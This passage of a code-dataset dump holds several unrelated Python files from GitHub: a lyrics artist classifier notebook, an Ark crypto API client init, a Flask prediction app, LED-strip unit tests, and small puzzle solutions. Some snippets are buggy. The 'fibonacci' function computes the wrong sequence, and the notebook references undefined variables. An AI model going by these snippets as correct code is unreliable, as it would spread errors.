sklearn.naive_bayes import MultinomialNB\n\nwarnings.filterwarnings('ignore')\n\nlist_artists = ['Queen', 'Muse', 'Janelle Monáe', 'Hot Chip',\n 'LCD Soundsystem', 'The Postal Service',\n 'Daft Punk', 'The Strokes']\n\ndf = pd.read_json('lyrics.jl', lines=True)\ndf_fix = df[df.titles != '']\nfor artist in list_artists:\n df_fix.loc[df_fix.artists.str.contains(artist), 'main_artist']=artist\n\ndf_fix = df_fix.dropna()\n\ndf_fix = df_fix.drop_duplicates(subset = 'lyrics')\ndf_fix.titles.value_counts().head(20)\ndf_fix[df_fix['titles']=='Invincible']\ndf_nodupe = df_fix.drop_duplicates(subset = ['titles', 'main_artist'])\ndf_nodupe.loc[:,'lyrics'] = df_nodupe['lyrics'].str.replace('\\r\\n', ' ') #could probably do this better with regex\ndf_nodupe.loc[:,'lyrics'] = df_nodupe['lyrics'].str.replace('\\n', ' ')\ndf_nodupe.drop_duplicates(subset = 'lyrics')\ndf_nodupe.dropna(inplace=True)\ndf_nodupe['first_6'] = df_nodupe.titles.str[0:8]\ndf_nodupe.first_6 = df_nodupe.first_6.str.lower()\ndf_nodupe_title = df_nodupe.drop_duplicates(subset = ['first_6', 'main_artist'])\ndf_nodupe_title[df_nodupe_title.first_6.str.contains('how')]\n\nX = df_nodupe_title.lyrics\ny = df_nodupe_title.main_artist\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)\n\ncv = CountVectorizer(lowercase=True, stop_words='english', token_pattern='[a-z]+')\ncv.fit(X_train)\nX_cv = cv.transform(X_train)\nX_test_cv = cv.transform(X_test)\n\nX_cv.todense()\n\nnb = MultinomialNB()\n\nnb.fit(X_cv, y_train)\ny_pred = nb.predict(X_test_cv)\nnb.fit(X_tf, y_train)\ny_pred_tfid = nb.predict(X_test_tf)\n\npredictions_cv = nb.predict_proba(X_test_cv)\nimport seaborn as sns\nsns.heatmap(predictions_cv)\n\ndef bayes_eval(y_true, y_pred, listofartists):\n cv_confusionmatrix = confusion_matrix(y_true, y_pred, labels = listofartists ,normalize = 'true' )\n ax = sns.heatmap(cv_confusionmatrix, annot = True, xticklabels = listofartists, yticklabels = listofartists)\n ax.set(xlabel='Predicted', ylabel='True')\n print(classification_report(y_true, y_pred))\n\nimport spacy\nmodel = spacy.load('en_core_web_md')\nX_tokens = [model(song) for song in X]\n\nlemmatized_word = []\nlemmatized_song = ''\nX_lemmatized = []\nfor song in X_tokens:\n lemmatized_word = []\n for word in song:\n lemmatized_word.append(word.lemma_)\n lemmatized_song = ' '.join(lemmatized_word)\n X_lemmatized.append(lemmatized_song)\nX_lemmatized[5]\n\nX_train_lem, X_test_lem, y_train, y_test = train_test_split(X_lemmatized, y, test_size=0.33, random_state=42)\ncv_lem = CountVectorizer(stop_words='english', lowercase = False, tokenizer = None, token_pattern='[a-z]+')\ncv_lem.fit(X_train_lem)\nX_train_lemcv = cv_lem.transform(X_train_lem)\nX_test_lemcv = cv_lem.transform(X_test_lem)\ncv_lem.get_feature_names()==cv.get_feature_names()\n\n\n# In[56]:\n\n\nnb.fit(X_train_lemcv, y_train)\ny_pred_lemcv = nb.predict(X_test_lemcv)\nbayes_eval(y_test, y_pred_lemcv, list_artists) #slightly different\n\n\n# In[57]:\n\n\ncv_lem = CountVectorizer(stop_words='english', lowercase = False, tokenizer = None, token_pattern='[a-z]+', min_df = 3)\ncv_lem.fit(X_train_lem)\nX_train_lemcv = cv_lem.transform(X_train_lem)\nX_test_lemcv = cv_lem.transform(X_test_lem)\ncv_lem.get_feature_names()==cv.get_feature_names()\n\nnb.fit(X_train_lemcv, y_train)\ny_pred_lemcv = nb.predict(X_test_lemcv)\nbayes_eval(y_test, y_pred_lemcv, list_artists) #changing min_df to 3 really improved things\n\n\n# In[58]:\n\n\nbayes_eval(y_test, y_pred_lemcv, list_artists) #changing min_df to 3\n\n\n# In[59]:\n\n\nvectorizer = TfidfVectorizer(lowercase=True, stop_words='english', token_pattern='[a-z]+', min_df= 5)\nX_train_lemtf =vectorizer.fit_transform(X_train_lem)\nX_test_lemtf = vectorizer.transform(X_test_lem)\n\n\n# In[60]:\n\n\nnb.fit(X_train_lemtf, y_train)\ny_pred_lemtf = nb.predict(X_test_lemtf)\nbayes_eval(y_test, y_pred_lemtf, list_artists) #still really really bad\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# # oversampling and undersampling\n\n# In[61]:\n\n\n#undersample first\nfrom imblearn.under_sampling import RandomUnderSampler, NearMiss\n\n\n# In[62]:\n\n\nlist_artists\n\n\n# In[63]:\n\n\ndf_nodupe_title.groupby('main_artist').count()\n\n\n# In[95]:\n\n\nsamp_dict = {'Queen':50, 'Muse':50, 'Janelle Monáe':30, 'Hot Chip':30,\n 'LCD Soundsystem':30, 'The Postal Service':6, 'Daft Punk':30, 'The Strokes':38 }\nrus = RandomUnderSampler(random_state=10, sampling_strategy=samp_dict)\nnm = NearMiss(sampling_strategy=samp_dict)\n\n\n# In[96]:\n\n\nX_rus, y_rus = rus.fit_resample(X_train_lemcv, y_train)\nX_nm, y_nm = nm.fit_resample(X_train_lemcv, y_train)\n\n\n# In[97]:\n\n\nX_rus.shape, y_rus.shape, np.unique(y_rus, return_counts=True)\n\n\n# In[67]:\n\n\nX_nm.shape, y_nm.shape, np.unique(y_nm, return_counts=True) #decreased overall amount of songs by about half\n\n\n# In[68]:\n\n\nX_train_lemcv.shape\n\n\n# In[ ]:\n\n\nnb.fit(X_rus, y_rus)\ny_pred_rus = nb.predict(X_test_lemcv)\n\n\n# In[69]:\n\n\nbayes_eval(y_test, y_pred_rus, list_artists) #rus destroyed accuracy - and queen can't be guessed as queen\n\n\n# In[ ]:\n\n\nnb.fit(X_nm, y_nm)\ny_pred_nm = nb.predict(X_test_lemcv)\n\n\n# In[70]:\n\n\nbayes_eval(y_test, y_pred_nm, list_artists) # near miss undersample\n\n\n# In[71]:\n\n\n# try oversampling instead\n\n\n# In[72]:\n\n\nfrom imblearn.over_sampling import RandomOverSampler, SMOTE\nupsample_dict = {'Queen':144, 'Muse':75, 'Janelle Monáe':50, 'Hot Chip':64, 'LCD Soundsystem':50,\n 'The Postal Service':20, 'Daft Punk':50, 'The Strokes':50 }\n\nros = RandomOverSampler(random_state=10)\n\n\n# In[73]:\n\n\nX_ros, y_ros = ros.fit_resample(X_train_lemcv, y_train)\n\n\n# In[74]:\n\n\nnp.unique(y_train, return_counts=True)\n\n\n# In[75]:\n\n\nnp.unique(y_ros, return_counts=True)\n\n\n# In[ ]:\n\n\nnb.fit(X_ros, y_ros)\ny_pred_ros = nb.predict(X_test_lemcv)\n\n\n# In[76]:\n\n\nbayes_eval(y_test, y_pred_ros, list_artists) #ros upsample to 144 for each\n\n\n# In[77]:\n\n\nfrom imblearn.over_sampling import SMOTE\n\n\n# In[78]:\n\n\nsm = SMOTE(random_state=42)\n\n\n# In[79]:\n\n\nX_sm, y_sm = sm.fit_resample(X_train_lemcv, y_train)\n\n\n# In[80]:\n\n\nnp.unique(y_sm, return_counts=True)\n\n\n# In[ ]:\n\n\nnb.fit(X_sm, y_sm)\ny_pred_sm = nb.predict(X_test_lemcv)\n\n\n# In[81]:\n\n\n#SMOTE upsample to 144 for each\nbayes_eval(y_test, y_pred_sm, list_artists) #works better for me than random\n\n\n# In[82]:\n\n\n#combine upsample and down sample\n\n\n# In[83]:\n\n\nfrom imblearn.combine import SMOTEENN\n\n\n# In[84]:\n\n\nsamp_dict\n\n\n# In[85]:\n\n\nsme = SMOTEENN(random_state=42)\n\n\n# In[86]:\n\n\nX_sme, y_sme = sme.fit_resample(X_train_lemcv, y_train)\n\n\n# In[87]:\n\n\nnp.unique(y_sme, return_counts=True)\n\n\n# In[ ]:\n\n\nnb.fit(X_sme, y_sme)\ny_pred_sme = nb.predict(X_test_lemcv)\n\n\n# In[88]:\n\n\nbayes_eval(y_test, y_pred_sme, list_artists) #that really killed accuracy, why did it bring the queen songs down to 2?\n\n\n# In[89]:\n\n\nfrom imblearn.combine import SMOTETomek\nupsample_dict\n\n\n# In[126]:\n\n\nsmt_dict = {'Queen': 144,'Muse': 100,'Janelle Monáe': 60, 'Hot Chip': 64, 'LCD Soundsystem': 60,'The Postal Service': 30,'Daft Punk': 60,'The Strokes': 60}\nsmt = SMOTETomek(random_state=42 )\nsampling_strategy=smt_dict\nX_smt, y_smt = smt.fit_resample(X_train_lemcv, y_train)\nnb.fit(X_smt, y_smt)\ny_pred_smt = nb.predict(X_test_lemcv)\n\n\n# In[128]:\n\n\nbayes_eval(y_test, y_pred_smt, list_artists) #SMOTETomek looks the same as SMOTE - 144 songs for each\n\n\n# In[ ]:\n\n\n\n\n\n# In[91]:\n\n\n# if time, write function to optimize the upsampling\n\n\n# In[92]:\n\n\n# make word clouds for fun\n\n\n# In[93]:\n\n\nfrom matplotlib import pyplot as plt\nimport wordcloud\n\n#mask = np.____((500, ____, 3), _____)\n#mask[150:350,____:350,:] = 255 # masked out area\ndef make_wordclouds(all_songs_list):\n fig, axs = plt.subplots(nrows=4, ncols=2,figsize=(10, 10))\n axs = axs.flatten()\n list_artists = ['Queen', 'Muse', 'Janelle Monáe', 'Hot Chip', 'LCD Soundsystem','The Postal Service', 'Daft Punk', 'The Strokes']\n# axes_list =[ ax1, ax2, ax3, ax4, ax5, ax6, ax7, ax8]\n for i, artist_list in enumerate(allsongs_list):\n cloud = wordcloud.WordCloud(background_color=\"white\",\n max_words=50,\n collocations=True, # calculates frequencies\n contour_color='steelblue').generate(''.join(artist_list))\n # stop words are removed!\n axs[i].imshow(cloud, interpolation='bilinear')\n axs[i].axis('off')\n name = str(artist_list)\n axs[i].set_title(str(list_artists[i]))\n\nplt.show()\n\n\n# In[122]:\n\n\nmake_wordclouds(allsongs_list)\n\n\n# In[ ]:\n\n\n\n\n\n# In[99]:\n\n\n#trying a random forest classifier for fun\nfrom sklearn.ensemble import RandomForestClassifier\nrfc = RandomForestClassifier()\n\n\n# In[100]:\n\n\nrfc.fit(X_train_lemcv, y_train)\ny_pred_rfc = rfc.predict(X_test_lemcv)\n\n\n# In[101]:\n\n\nbayes_eval(y_test, y_pred_rfc, list_artists) #randomforest did a little worse than the bayes\n\n\n# In[102]:\n\n\nsamp_dict\n\n\n# In[103]:\n\n\nupsample_dict\n\n\n# In[104]:\n\n\ndownsam_dict = {'Queen': 100,\n 'Muse': 75,\n 'Janelle Monáe': 50,\n 'Hot Chip': 64,\n 'LCD Soundsystem': 50,\n 'The Postal Service': 20,\n 'Daft Punk': 40,\n 'The Strokes': 50}\n\n\n# In[105]:\n\n\nnp.unique(y_train, return_counts=True)\n\n\n# In[106]:\n\n\nfrom imblearn.under_sampling import EditedNearestNeighbours\nfrom imblearn.pipeline import make_pipeline\nupsmote= SMOTE(random_state=42, sampling_strategy= upsample_dict)\nenn = EditedNearestNeighbours() # this works poorly in the pipeline\nrus = RandomUnderSampler(random_state=42, sampling_strategy=downsam_dict)\n\n\n# In[107]:\n\n\nup_down_pipeline = make_pipeline(upsmote, rus, nb)\n\n\n# In[108]:\n\n\nup_down_pipeline.fit(X_train_lemcv, y_train)\n\n\n# In[109]:\n\n\ny_pred_pipeline = up_down_pipeline.predict(X_test_lemcv)\n\n\n# In[110]:\n\n\nbayes_eval(y_test, y_pred_pipeline, list_artists) # Is this better? Unclear\n\n\n# In[111]:\n\n\n#try pipeline with tfidf vectorized data\nup_down_pipeline.fit(X_train_lemtf, y_train)\n\n\n# In[112]:\n\n\ny_pred_pipeline_tf = up_down_pipeline.predict(X_test_lemtf)\n\n\n# In[113]:\n\n\nbayes_eval(y_test, y_pred_pipeline, list_artists) #with resampling, looks essentially the same was with cv\n\n\n# In[124]:\n\n\naccuracy_summary = {'Strategy':['CV', 'Tfidf', 'CV+lemma', 'CV+lemma+min_df','Tfidf+lemma', 'Tfidf+lemma+min_df',\n 'CV+lemma+Rus',\n 'CV+lemma+NearMiss', 'CV+lemma+Ros', 'CV+lemma+SMOTE', 'CV+lemma+smoteteen',\n 'CV+lemma+Smotetomek','Random Forest - CV+lemma', 'CV+lemma+pipeline',\n 'Tfidf+lemma+pipeline'], 'Accuracy':[0.47, 0.28, 0.55, 0.55, 0.28,\n 0.29, 0.44, 0.42, 0.49,0.56,\n 0.35, 0.53, 0.45, 0.51, 0.51]}\ndf_summary = pd.DataFrame(accuracy_summary, columns = ['Strategy', 'Accuracy'])\n\n\n# In[125]:\n\n\ndf_summary.sort_values('Accuracy', ascending = False)\n\n\n# In[123]:\n\n\nmake_wordclouds(allsongs_list)\n\n\n# ### What I've learned from doing this:\n# - Lemmatization makes a big difference\n# - Several issues with really small sample sizes\n# - in training\n# - in calculating accuracy\n# - Pipelines/resampling/etc.\n# ### Further questions:\n# - How to more effectively use Spacy\n# - How can we use Spacy to effectively look at document similarity\n# - Upsampling before tfidf?\n# ### Things to add to this project:\n# - Combine into single py file with the best looking model, allow user input of new song for test (in progress)\n# - Iteratively remove artists to see what the best combination is\n# - Iterirate through different values for the sampling strategies to optimize pipeline\n# - Add features - usage of parts of speech, sentiment analysis\n# - Mask word clouds onto some kind of symbol/art for the artist\n# - Add Spotify playlist\n\n# In[116]:\n\n\nget_ipython().system('dbus-send --print-reply --dest=org.mpris.MediaPlayer2.spotify /org/mpris/MediaPlayer2 org.mpris.MediaPlayer2.Player.Play')\n\n\n\n# In[117]:\n\n\n#try the spacy with spacys own vectorization\ntype(X_tokens[1])\n\n\n# In[118]:\n\n\n#turn each word into a vector\ndef vector(tokens):\n\n song_vectors = []\n for item in tokens:\n word_vectors=[]\n for word in item:\n word_vectors.append(model.vocab[word].vector)\n song_vectors.append(word_vectors)\n return song_vectors\n\n\n# In[119]:\n\n\n#totally confused\nspacy_vectors = vector(X_tokens)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[120]:\n\n\nfrom spacy.lemmatizer import Lemmatizer\nfrom spacy.lookups import Lookups\n\nlookups = Lookups()\nlemmatizer = Lemmatizer(lookups)\nX_lemmas = lemmatizer(X)\nprint(X_lemmas)\n\n#this is a dead end - lemmatizer is only for single words maybe?\n\n\n# In[121]:\n\n\n# make lists for each artist\n# maybe this was unecessary\n\nqueen_list = df_nodupe_title[df_nodupe_title['main_artist']=='Queen'].lyrics.to_list()\nmuse_list = df_nodupe_title[df_nodupe_title['main_artist']=='Muse'].lyrics.to_list()\njanelle_list = df_nodupe_title[df_nodupe_title['main_artist']=='Janelle Monáe'].lyrics.to_list()\nhotchip_list = df_nodupe_title[df_nodupe_title['main_artist']=='Hot Chip'].lyrics.to_list()\nlcd_list = df_nodupe_title[df_nodupe_title['main_artist']=='LCD Soundsystem'].lyrics.to_list()\npostalservice_list = df_nodupe_title[df_nodupe_title['main_artist']=='The Postal Service'].lyrics.to_list()\ndaftpunk_list = df_nodupe_title[df_nodupe_title['main_artist']=='Daft Punk'].lyrics.to_list()\nstrokes_list = df_nodupe_title[df_nodupe_title['main_artist']=='The Strokes'].lyrics.to_list()\n\nallsongs_list = [queen_list, muse_list, janelle_list, hotchip_list, lcd_list, postalservice_list, daftpunk_list,strokes_list]\n\n#there has got to be a better way to do this, but can't change the list name in a for loop\n\n#for artist in list_artists:\n #lyrics_dict = df_nodupe_title[df_nodupe_title['main_artist']==str(artist)].lyrics.to_dict()\n\n#df_nodupe_title.index = df_nodupe_title.main_artist\n#lyrics_dict = df_nodupe_title.to_dict('index')# dictionary is overwriting\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n","repo_name":"thedinak/lyrics_analysis","sub_path":"lyrics_classifier.py","file_name":"lyrics_classifier.py","file_ext":"py","file_size_in_byte":14199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9702366538","text":"# -*- encoding: utf8 -*-\n# created by Toons on 01/05/2017\nimport sys, binascii\nimport json, requests\n\n__PY3__ = True if sys.version_info[0] >= 3 else False\nif __PY3__:\n\tfrom io import BytesIO as StringIO\n\tlong = int\nelse:\n\tfrom StringIO import StringIO\n\n\n# GET generic method for ARK API\ndef get(api, dic={}, **kw):\n\treturnkey = kw.pop(\"returnKey\", False)\n\tdata = json.loads(requests.get(__URL_BASE__+api, params=dict(dic, **kw)).text)\n\tif data[\"success\"] and returnkey: return ArkyDict(data[returnkey])\n\telse: return ArkyDict(data)\n\n\nclass ArkyDict(dict):\n\t\"\"\"\nPython dict with javascript behaviour.\n>>> ad = ArkyDict()\n>>> ad[\"key1\"] = \"value1\"\n>>> ad.key2 = \"value2\"\n>>> ad\n{'key2': 'value2', 'key1': 'value1'}\n\"\"\"\n\t__setattr__ = lambda obj,*a,**k: dict.__setitem__(obj, *a, **k)\n\t__getattr__ = lambda obj,*a,**k: dict.__getitem__(obj, *a, **k)\n\t__delattr__ = lambda obj,*a,**k: dict.__delitem__(obj, *a, **k)\n\n\ndef swich(net=False):\n\t\"\"\"\nSwich between mainnet and testnet\n>>> swich(True) # use mainnet\n>>> swich(False) # use testnet\n\"\"\"\n\tglobal __NETWORK__, __URL_BASE__, __HEADERS__\n\n\t__NETWORK__ = ArkyDict()\n\t__HEADERS__ = ArkyDict()\n\n\tif net:\n\t\t# values are not all correct\n\t\t__URL_BASE__ = \"http://node1.arknet.cloud:4000\"\n\t\t__NETWORK__.update(\n\t\t\tmessagePrefix = b\"\\x18Ark Signed Message:\\n\",\n\t\t\tbip32 = ArkyDict(public=0x043587cf, private=0x04358394),\n\t\t\tpubKeyHash = b\"\\x6f\",\n\t\t\twif = b\"\\xef\",\n\t\t)\n\t\t__HEADERS__.update({\n\t\t\t'Content-Type': 'application/json; charset=utf-8',\n\t\t\t'os': 'arkwalletapp',\n\t\t\t'version': '0.5.0',\n\t\t\t'port': '1',\n\t\t\t'nethash': \"ed14889723f24ecc54871d058d98ce91ff2f973192075c0155ba2b7b70ad2511\"\n\t\t})\n\n\telse:\n\t\t__URL_BASE__ = \"http://node1.arknet.cloud:4000\"\n\t\t__NETWORK__.update(\n\t\t\tmessagePrefix = b\"\\x18Testnet Ark Signed Message:\\n\",\n\t\t\tbip32 = ArkyDict(public=0x0488b21e, private=0x0488ade4),\n\t\t\tpubKeyHash = b\"\\x17\",\n\t\t\twif = b\"\\xaa\",\n\t\t)\n\t\t__HEADERS__.update({\n\t\t\t'Content-Type': 'application/json; charset=utf-8',\n\t\t\t'os': 'arkwalletapp',\n\t\t\t'version': '0.5.0',\n\t\t\t'port': '1',\n\t\t\t'nethash': \"8b2e548078a2b0d6a382e4d75ea9205e7afc1857d31bf15cc035e8664c5dd038\"\n\t\t})\n\nswich(False)\n\n\n# ARK fees according to transactions in SATOSHI\n__FEES__ = ArkyDict({\n\t\"send\": 10000000,\n\t\"vote\": 100000000,\n\t\"delegate\": 2500000000,\n\t\"secondsignature\": 500000000,\n\t\"multisignature\": 500000000,\n\t\"dapp\": 2500000000\n})\n","repo_name":"ravelou/arky","sub_path":"arky/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"45072385586","text":"from flask import Flask, render_template, request\nimport pickle\nfrom sklearn.preprocessing import MinMaxScaler\n\napp = Flask(__name__)\n\nwith open('gb_model.pkl', 'rb') as model_file:\n loaded_gb_model = pickle.load(model_file)\n\n# Routes\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n if request.method == 'POST':\n\n user_id = request.form['user_id']\n age = float(request.form['age'])\n gender = 1 if request.form['gender'] == 'Male' else 0\n salary = float(request.form['salary'])\n \n prediction = loaded_gb_model.predict([[age, gender, salary]])\n\n if prediction[0] == 1:\n result_message = f\"Customer with ID {user_id} is likely to purchase a car.\"\n else:\n result_message = f\"Customer with ID {user_id} is unlikely to purchase a car.\"\n \n return render_template('result.html', prediction=prediction[0], message=result_message)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"smartinternz02/SI-GuidedProject-611318-1698393972","sub_path":"Project Development Phase/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24913463773","text":"from custom_types import PixelToLight\nfrom utils import get_strip_and_index, group_pixels_to_light_by_pin, assemble_strip_config\n\n\ndef test_get_strip_and_index_none():\n \"\"\"\n too far away to light anything\n \"\"\"\n strip_1 = {\n \"offset\": 2.2,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 18,\n \"reverse\": False,\n }\n strip_2 = {\n \"offset\": 1,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 13,\n \"reverse\": False,\n }\n strips = [strip_1, strip_2]\n\n dist = 3\n\n strip, index = get_strip_and_index(strips, dist)\n assert strip is None\n assert index is None\n\n\ndef test_get_strip_and_index_strip_1():\n \"\"\"\n light strip further away\n \"\"\"\n strip_1 = {\n \"offset\": 2.2,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 18,\n \"reverse\": False,\n }\n strip_2 = {\n \"offset\": 1,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 13,\n \"reverse\": False,\n }\n strips = [strip_1, strip_2]\n\n dist = 2\n\n strip, index = get_strip_and_index(strips, dist)\n assert strip[\"offset\"] == strip_1[\"offset\"]\n assert index is not None\n\n\ndef test_get_strip_and_index_strip_1_reverse():\n \"\"\"\n light strip further away\n \"\"\"\n strip_1 = {\n \"offset\": 2.2,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 18,\n \"reverse\": True,\n }\n strip_2 = {\n \"offset\": 1,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 13,\n \"reverse\": False,\n }\n strips = [strip_1, strip_2]\n\n dist = 2\n\n strip, index = get_strip_and_index(strips, dist)\n assert strip[\"offset\"] == strip_1[\"offset\"]\n expected_index = (\n strip_1[\"length\"] * strip_1[\"leds_per_m\"]\n - (strip_1[\"offset\"] - dist) * strip_1[\"leds_per_m\"]\n )\n assert index == round(expected_index)\n\n\ndef test_get_strip_and_index_strip_2():\n \"\"\"\n light strip closer by\n \"\"\"\n strip_1 = {\n \"offset\": 2.2,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 18,\n \"reverse\": False,\n }\n strip_2 = {\n \"offset\": 1,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 13,\n \"reverse\": False,\n }\n strips = [strip_1, strip_2]\n\n dist = 0.1\n\n strip, index = get_strip_and_index(strips, dist)\n assert strip[\"offset\"] == strip_2[\"offset\"]\n assert index is not None\n\n\ndef test_get_strip_and_index_gap():\n \"\"\"\n don't light anything in strip gap\n \"\"\"\n strip_1 = {\n \"offset\": 2.2,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 18,\n \"reverse\": False,\n }\n strip_2 = {\n \"offset\": 1,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 13,\n \"reverse\": False,\n }\n strips = [strip_1, strip_2]\n\n dist = 1.1\n\n strip, index = get_strip_and_index(strips, dist)\n assert strip is None\n assert index is None\n\n\ndef test_group_pixels_by_pin():\n \"\"\"\n group pixels to be lit correctly by pin number\n \"\"\"\n pixel_1: PixelToLight = {\"pin\": 1, \"pixel_index\": 3, \"color\": \"#f00000\"}\n pixel_2: PixelToLight = {\"pin\": 2, \"pixel_index\": 3, \"color\": \"#ffffff\"}\n pixel_3: PixelToLight = {\"pin\": 2, \"pixel_index\": 4, \"color\": \"#000000\"}\n\n grouped = group_pixels_to_light_by_pin([pixel_1, pixel_2, pixel_3])\n\n assert 1 in grouped.keys()\n assert 2 in grouped.keys()\n assert len(grouped[2]) == 2\n\n\ndef test_assemble_strip_config():\n \"\"\"\n assemble strip config correctly\n \"\"\"\n strip_1 = {\n \"offset\": 2.2,\n \"length\": 1,\n \"leds_per_m\": 30,\n \"gpio_pin\": 18,\n \"reverse\": False,\n }\n strip_2 = {\n \"offset\": 1,\n \"length\": 1,\n \"ledsPerM\": 60,\n \"gpioPin\": 13,\n \"reverse\": False,\n }\n strips = [strip_1, strip_2]\n\n strip_config = assemble_strip_config(strips)\n\n assert len(strip_config) == 2\n assert strip_config[0][\"gpio_pin\"] == strip_1[\"gpio_pin\"]\n assert strip_config[0][\"leds_per_m\"] == strip_1[\"leds_per_m\"]\n assert strip_config[1][\"gpio_pin\"] == strip_2[\"gpioPin\"]\n assert strip_config[1][\"leds_per_m\"] == strip_2[\"ledsPerM\"]","repo_name":"creimers/dont-led-me-down","sub_path":"test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8244555974","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val, children):\n self.val = val\n self.children = children\n\"\"\"\nclass Solution:\n def postorder(self, root: 'Node') -> List[int]:\n # first a recursive solution\n if not root: return []\n if not root.children: return [root.val]\n \n ls = []\n for i in root.children:\n ls = ls + self.postorder(i)\n ls = ls + [root.val]\n return ls\n \n # and now an iterative solution\n # although for the record iteration and trees go together... poorly.\n \n # tbh right now i'm too tired to finish this but there's a decent chance i'll finish it tomorrow\n # honestly i'm exhausted, i already solved the problem the intuitive way,\n # and i'm gonna store it on github before i go to bed so i don't lose it\n # but for the record it's just an iterative dfs (which is a shitty way to code a dfs)\n # and we just shove stuff in a stack. idk i'm so tired you guys.\n \n '''if not root: return []\n if not root.children: return [root.val]\n \n ls = [] # an actual list of the elts\n stack = [] # the stack we're drawing from'''\n","repo_name":"annasw/LeetCode","sub_path":"586-N-ary-Tree-Postorder-Traversal.py","file_name":"586-N-ary-Tree-Postorder-Traversal.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11169635225","text":"import InputReader\n\n\ndef main():\n keys = InputReader.readInputFileNumbers(25)\n subjectNumber = 7\n\n encryptionKey = getKey(keys[1], getLoopSize(keys[0], subjectNumber))\n print(f\"The encryption key is {encryptionKey}.\")\n\n\ndef getKey(subjectNumber, loopSize):\n \"\"\"Generates the encryption key from the subject number and the loop size.\n \n The encryption key starts as 1.\n Then the following actions get executed loop size times:\n \n * multiply the previous value by the subject number\n * set the encryption key to the remainder from dividing the previous\n result by 20201227\n \n Parameters\n ----------\n subjectNumber: int\n The subject number to use in the calculation.\n loopSize: int\n How many times to execute the calculation.\n \n Returns\n -------\n int\n The resulting encryption key.\n \"\"\"\n value = 1\n for _ in range(loopSize):\n value = value * subjectNumber % 20201227\n return value\n\n\ndef getLoopSize(key, subjectNumber):\n \"\"\"Reverse engineers the loop size from the given key and subject number.\n \n This is done by continually dividing the key by the subject number\n until the result matches 1.\n If the result has decimal digits 20201227 gets added to the previous\n key, before it is divided again.\n By counting the divisions the loop size can be determined.\n \n Parameters\n ----------\n key: int\n The key to get the loop size for.\n subjectNumber: int\n The subject number used to generate the key.\n \n Returns\n -------\n int\n The loop size used to generate the given key.\n \"\"\"\n loopSize = 0\n while key != 1:\n newKey = key / subjectNumber\n while newKey % 1 != 0:\n key += 20201227\n newKey = key / subjectNumber\n\n key = newKey\n loopSize += 1\n\n return loopSize\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ToMe25/AdventOfCode","sub_path":"2020/Python/src/Day25.py","file_name":"Day25.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4786913438","text":"\"\"\"\nFibonacci\n\nCreated on Mon Feb 28, 2022\n\n@author: Th3-Al7ha10\n\n\n\"\"\"\npos = input('Please enter the position of the number in Fibonacci sequence \\n')\n\ndef fibonacci (k):\n\n if k==1:\n return 0\n else:\n return fibonacci(k-1) + k-1\n \nfor i in range (1,pos+1):\n print('{}e position: {}'.format(i,fibonacci(i)))\n","repo_name":"Th3-Al7ha10/Python-Projects-Level-1","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28343708803","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 9 09:38:22 2017\n\n@author: neal\n\"\"\"\nimport csv\n\nclass LoadSensorTsvFile:\n \"\"\"\n \"\"\"\n def __init__(self):\n self.files_data = []\n self.feature = []\n \n pass\n \n def read_in_file(self, file): \n csv_reader = csv.reader(open(file))\n file_data = [[0]*51]*7\n row_num = 0\n for row in csv_reader:\n file_data[row_num] = row[0].split('\\t')\n del file_data[row_num][-1]\n for i in range(len(file_data[row_num])):\n file_data[row_num][i] = float(file_data[row_num][i])\n row_num += 1\n# print file_data\n self.files_data.append(file_data)\n\n \n def read_in_files(self, file_path=\"\"):\n \"\"\"\n file_path: Folder containing data files\n \"\"\"\n files = []\n for i in range(8):\n files.append(file_path + \"/direction_\" + str(i+1) + \".tsv\")\n for file in files:\n self.read_in_file(file)\n \n def get_feature(self, feature_func, slice_range=[23, 28]):\n \"\"\"\n \"\"\"\n for file_data in self.files_data:\n feature_func(file_data, slice_range)\n# print self.feature\n \n def slice_avg(self, file_data, slice_range):\n \"\"\"Calculate the average value of a slice of the data\n \"\"\"\n row_num = 0\n feature_data = [0] * 7\n for 